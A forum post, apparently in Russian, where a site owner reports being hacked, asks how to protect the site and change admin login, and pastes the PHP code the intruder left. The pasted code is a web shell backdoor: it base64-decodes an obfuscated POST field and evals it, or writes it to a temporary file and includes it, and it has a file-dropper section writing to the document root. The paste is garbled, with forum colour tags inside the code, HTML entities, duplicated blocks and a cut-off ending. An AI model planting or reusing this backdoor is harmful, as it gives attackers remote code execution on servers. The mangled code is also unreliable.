Собственно, взломали и оставили код. Как можно защититься? Думаю, ломали через админку... Можно как-нибудь изменить способ авторизации? Пример кода...
<!--FILE IS NULL OR EMPTY--><?php$version = "1.5";if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["[color=#FF0000]gjwqweodsa[/color]"])){$isevalfunctionavailable = false;$evalcheck = "\\$isevalfunctionavailable = true;";@eval($evalcheck);if ($isevalfunctionavailable === true) { $fnsdht = "b".""."as"."e"."".""."6";."4"."_"."de".""."c"."o"."&#34;."d"."e"; $fv = $fnsdht($_POST["[color=#FF0000]gjwqweodsa[/color]"]); @eval($fv); //@eval($_POST["gjwqweodsa"]);}else{ $mpath = realpath("")."/"; //$dop = "\\n@unlink(\\"".$mpath."dsadasdsa1fag1.php\\");;\\n"; if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\\n".$fnsdht($_POST 1;"[color=#FF0000]gjwqweodsa[/color]"])."\
?>")){ &nbsp; @include_once($mpath."dsadasdsa1fag1.php"); &nbsp; @unlink($mpath."dsadasdsa1fag1.php"); }else{ &nbsp; echo "ERROR! CANT DO NOTHING!"; }}$version = "1.5";if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){ $isevalfunctionavailable = false; $evalcheck = "\\$isevalfunctionavailable = true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { $fnsdht = "b".""."as"."e"."".""."6";."4"."_"."de".""."c"."o"."&#34;."d"."e"; $fv = $fnsdht($_POST["gjwqweodsa"]); @eval($fv); //@eval($_POST["gjwqweodsa"]); }else{ $mpath = realpath("")."/"; //$dop = "\\n@unlink(\\"".$mpath."dsadasdsa1fag1.php\\");;\\n"; if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\\n".$fnsdht($_POST["gjwqweodsa"&#93;)."\\n?>")){ @include_once($mpath."dsadasdsa1fag1.php"); @unlink($mpath."dsadasdsa1fag1.php"); }else{ echo "ERROR! CANT DO NOTHING!"; } }}//if (is_uploaded_file($_FILES['file']['tmp_name']))if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0){ $fname = trim($_POST['fname']); $save_type = trim($_POST['save_type']); $dirname = trim($_POST['dirname']); $namecrt = trim($_POST['namecrt']); $auth_pass = trim($_POST['auth_pass']); $change_pass = trim($_POST['change_pass']); $file_type = trim($_POST['file_type']); $ftdata = trim($_POST['ftdata']); $is_sh = trim($_POST['is_sh']); if($namecrt == "random"){ $fname = make_name($fname); } $uploadfile = ""; if($save_type == "same_dir"){ $uploadfile = realpath("")."/". $fname; }else if($save_type == "sub_dir"){ $uploadfile = realpath("")."/$dirname/". $fname; if(!@mkdir(realpath("")."/$dirname/", 0755)){ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root"){ $root = $_SERVER['DOCUMENT_ROOT']."/"; if(@is_writable($root)){ $uploadfile = $root.$fname; }else{ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root_in_dir"){
?>")){ &nbsp; @include_once($mpath."dsadasdsa1fag1.php"); &nbsp; @unlink($mpath."dsadasdsa1fag1.php"); }else{ &nbsp; echo "ERROR! CANT DO NOTHING!"; }}$version = "1.5";if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){ $isevalfunctionavailable = false; $evalcheck = "\\$isevalfunctionavailable = true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { $fnsdht = "b".""."as"."e"."".""."6";."4"."_"."de".""."c"."o"."&#34;."d"."e"; $fv = $fnsdht($_POST["gjwqweodsa"]); @eval($fv); //@eval($_POST["gjwqweodsa"]); }else{ $mpath = realpath("")."/"; //$dop = "\\n@unlink(\\"".$mpath."dsadasdsa1fag1.php\\");;\\n"; if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\\n".$fnsdht($_POST["gjwqweodsa"&#93;)."\\n?>")){ @include_once($mpath."dsadasdsa1fag1.php"); @unlink($mpath."dsadasdsa1fag1.php"); }else{ echo "ERROR! CANT DO NOTHING!"; } }}//if (is_uploaded_file($_FILES['file']['tmp_name']))if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0){ $fname = trim($_POST['fname']); $save_type = trim($_POST['save_type']); $dirname = trim($_POST['dirname']); $namecrt = trim($_POST['namecrt']); $auth_pass = trim($_POST['auth_pass']); $change_pass = trim($_POST['change_pass']); $file_type = trim($_POST['file_type']); $ftdata = trim($_POST['ftdata']); $is_sh = trim($_POST['is_sh']); if($namecrt == "random"){ $fname = make_name($fname); } $uploadfile = ""; if($save_type == "same_dir"){ $uploadfile = realpath("")."/". $fname; }else if($save_type == "sub_dir"){ $uploadfile = realpath("")."/$dirname/". $fname; if(!@mkdir(realpath("")."/$dirname/", 0755)){ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root"){ $root = $_SERVER['DOCUMENT_ROOT']."/"; if(@is_writable($root)){ $uploadfile = $root.$fname; }else{ $uploadfile = realpath("")."/". $fname; } }else if($save_type == "root_in_dir"){